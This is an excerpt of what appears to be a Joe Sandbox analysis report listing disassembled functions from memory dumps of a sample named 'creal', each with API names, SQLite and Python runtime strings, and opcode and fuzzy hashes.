                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                • API String ID: 3510742995-2916047017
                                                                                                                                                                                                                • Opcode ID: b7bfc3dbd21539bfb7ebed18bb2dcfa1b9ea1d55930205eba394a99b17038129
                                                                                                                                                                                                                • Instruction ID: dc8998d05b03170a6b0751dfc1842d4c1c9f78ddd7e7b1179e161ed5121359f6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7bfc3dbd21539bfb7ebed18bb2dcfa1b9ea1d55930205eba394a99b17038129
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D351F6BAB386AE85EB60DB51C44877A2764FF51BF4F580631DA2E072C5DE6CE441C701
                                                                                                                                                                                                                Function 00007FF8E68D8190 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memmove
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2162964266-3418467682
                                                                                                                                                                                                                • Opcode ID: bfd5b6867c2c0374446975610139a0db3b3e046f3ae2520d988382fd826a3f94
                                                                                                                                                                                                                • Instruction ID: 46aaac9893a720986546511ebce35c5a8e8254efffd7383cdec9f0a221013b95
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfd5b6867c2c0374446975610139a0db3b3e046f3ae2520d988382fd826a3f94
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE518A76B28BD0D6EA608F55E4003AEB7A9FB89BD4F544022DA8C53B68CF3CD495C701
                                                                                                                                                                                                                Function 00007FF8E68DF030 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: $%!.15g$-
                                                                                                                                                                                                                • API String ID: 3510742995-875264902
                                                                                                                                                                                                                • Opcode ID: c624ad0bc44100b506bc71d4bfca6c8542f81e3f3e35595397915d470e7bca72
                                                                                                                                                                                                                • Instruction ID: 73ceedc5b94cf8b8adc9d1fd3989ae69d8dc5ebb582184d29b32cd8a2ab854b8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c624ad0bc44100b506bc71d4bfca6c8542f81e3f3e35595397915d470e7bca72
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3412762F2C79582EB11CB6EE0417AA7BA4EB857C4F005135EA8D07B96CB3DD905CB11
                                                                                                                                                                                                                Function 00007FF8E68CBDF0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                • Opcode ID: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
                                                                                                                                                                                                                • Instruction ID: 8014b07c7cf70dd7db478d84f1595498685b6edbd3fdebfaddb9a6b93c09ad63
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D41BD22B38B6692EB609F95E0403B973A4FB84BD0F641135EB8E17794DF7CD8018B42
                                                                                                                                                                                                                Function 00007FF8E68D77F0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 0-3418467682
                                                                                                                                                                                                                • Opcode ID: 8577bfbe5d932445ad4f04faa4fad4ca1e8a6b6e449546e0024e713a034ae5f8
                                                                                                                                                                                                                • Instruction ID: ddf0167c918b85ee9069e880617b4955542fadbf00a48f5e75effe57e0dac64d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8577bfbe5d932445ad4f04faa4fad4ca1e8a6b6e449546e0024e713a034ae5f8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F310B73A183D19AD704CF6AD09027C7FA0E781B84B04813AEFD94B799EA3CD561C760
                                                                                                                                                                                                                Function 00007FF8E7142E10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$BoolCompareObject_Rich
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 74976934-0
                                                                                                                                                                                                                • Opcode ID: 06e8f97dbb0ea0e89ed53f8803494b3fcf86a5d1c840b79286c23275ed2a61a7
                                                                                                                                                                                                                • Instruction ID: b7815d60fd0d93bf5a55ec08cc6d4c785b6eaca4758f42181c7389682fe78c48
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06e8f97dbb0ea0e89ed53f8803494b3fcf86a5d1c840b79286c23275ed2a61a7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15116332A18742C6E7548BA9E54437C2391AF55BF0F081330DA7A676E5EF2CE8D18707
                                                                                                                                                                                                                Function 00007FF8E7144C90 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3617616757-0
                                                                                                                                                                                                                • Opcode ID: ece71df874b8b5f5a56a715ca088fb7d08a9acaf02b1d109a510bd9dd73bf957
                                                                                                                                                                                                                • Instruction ID: fa5a4fe70e57d496ae7c60ad8b696944b344c7d1d1e90bb3e195e1ed8cad525d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ece71df874b8b5f5a56a715ca088fb7d08a9acaf02b1d109a510bd9dd73bf957
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0221A576919742C1EB798FB4D84837C22A1AB55BB9F280330CE79411D0EF7DA4868356
                                                                                                                                                                                                                Function 00007FF8E6FB150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577473923.00007FF8E6FB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF8E6FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577410915.00007FF8E6FB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577517217.00007FF8E6FB2000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577555444.00007FF8E6FB4000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fb0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: 0baeea097dfd391caeb23ce1cd709dc375e05fd8cc26cab7f33f9427a773fc6d
                                                                                                                                                                                                                • Instruction ID: 7e5a139aee8ab1a6f28307252521dee464caf294c598b65e5ae2ae9235c86ce4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0baeea097dfd391caeb23ce1cd709dc375e05fd8cc26cab7f33f9427a773fc6d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D112E22B68F0989EB00CFA0E8543B833A4FB19798F481E31DA6D467A4DF7CD198C341
                                                                                                                                                                                                                Function 00007FF8E69DB1DC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: 053a4ead8fbd86b108cff19f95c251b98a389c566ad07baf748d71a84e062db2
                                                                                                                                                                                                                • Instruction ID: e2754a82805e46456a6f48a67dfb2ff450970bd9c11ad6be9e2889bb2cf3b0e1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 053a4ead8fbd86b108cff19f95c251b98a389c566ad07baf748d71a84e062db2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A113C26B28F058AEB00DFA0E8593B833A4FB19798F441E31DB6D467A5DF7CD1998341
                                                                                                                                                                                                                Function 00007FF8E6F3150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575627628.00007FF8E6F31000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8E6F30000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575586394.00007FF8E6F30000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575707674.00007FF8E6F33000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575751750.00007FF8E6F35000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6f30000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                • Instruction ID: d2383516576d822b422cf5aa002cac56f6b52006e7371d5dad2c51fbf8869cf3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46112E62B64F4689EB00CFA0E8543B833A4FB29B98F441E31DA6D467A4DF7CD1988341
                                                                                                                                                                                                                Function 00007FF8E6FC150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577634657.00007FF8E6FC1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF8E6FC0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577585028.00007FF8E6FC0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577691044.00007FF8E6FC3000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577732223.00007FF8E6FC4000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577775069.00007FF8E6FC5000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fc0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                • Instruction ID: 45a38af914955459da9d42c08ab17764a305c25bda3f1e58daa7f3bd20c8bcc3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51111C22B64B0599EB00CBA0E8543F833A4FB29798F441E31DA6D467A4DF7CD1988345
                                                                                                                                                                                                                Function 00007FF8E6F1150C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575166000.00007FF8E6F11000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FF8E6F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575122286.00007FF8E6F10000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575218759.00007FF8E6F16000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575264792.00007FF8E6F1B000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6f10000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: 1180e2e5db8fc01fcffb0ed67e503fd1d649ff95b0bf32135d6d632c2e4928ca
                                                                                                                                                                                                                • Instruction ID: 7a18c757b9289fddb4bf78e22caee135e82848b4a4fdf396109abb7711e97c1c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1180e2e5db8fc01fcffb0ed67e503fd1d649ff95b0bf32135d6d632c2e4928ca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B711FA26B24F058AEB00CFA0E8553B833A4FB597D8F441E35DA6D467A9DF7CD1A88341
                                                                                                                                                                                                                Function 00007FF8E7153E9C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: d9e6e1a99beb20024c39237dbb01f35985b29cf17aeeaa0b650d61652553da3b
                                                                                                                                                                                                                • Instruction ID: 304fb00ef77a63d03df5bfe649ff4001e43d76905f505f263f3be130ae372853
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9e6e1a99beb20024c39237dbb01f35985b29cf17aeeaa0b650d61652553da3b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3111C22B14B4589EB00CBA0E8543BD33A4FB19798F440D31DA6D467A4EF7CD1988381
                                                                                                                                                                                                                Function 00007FF8E7143520 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$ArgsCallDeallocErr_InstanceObject
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 469999563-0
                                                                                                                                                                                                                • Opcode ID: 735d7802508a943567c1b886ab3bcdb7dadecb2b687cb30f547209437c5526d2
                                                                                                                                                                                                                • Instruction ID: dc4e378708606954dd004217760b0a930a590b6593306583e5a57db477087cc8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 735d7802508a943567c1b886ab3bcdb7dadecb2b687cb30f547209437c5526d2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65F0AF31E19B42C1EA594BA6E94433D63A2AF44FD1F045030CD6E4B754EF7CE4919702
                                                                                                                                                                                                                Function 00007FF8E7144050 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_Unicode_
                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                • API String ID: 3285369508-1523873471
                                                                                                                                                                                                                • Opcode ID: 01e85d9c1bd3d17e433c8fb88ec89fd76347e07627257ce4696b6525bbbdcfea
                                                                                                                                                                                                                • Instruction ID: f18dd1fa792336a3d609c9520622749811c466460284e1808a142e87ca7b75b6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01e85d9c1bd3d17e433c8fb88ec89fd76347e07627257ce4696b6525bbbdcfea
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A4145A2B0878583EB048B56E4113AD6BA0EBA1BE0F441130DE6E47795EE3CF542C742
                                                                                                                                                                                                                Function 00007FF8E7153533 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_Item
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 1953171116-217463007
                                                                                                                                                                                                                • Opcode ID: d0256b5094a83c2cce43499a17dbe8ec4dca85f9fba9f3344b29a1cf4ce49e16
                                                                                                                                                                                                                • Instruction ID: c603ff8fad21cfe56887b0488f0330056048b2df20ff981cfa9148454ce56b5c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0256b5094a83c2cce43499a17dbe8ec4dca85f9fba9f3344b29a1cf4ce49e16
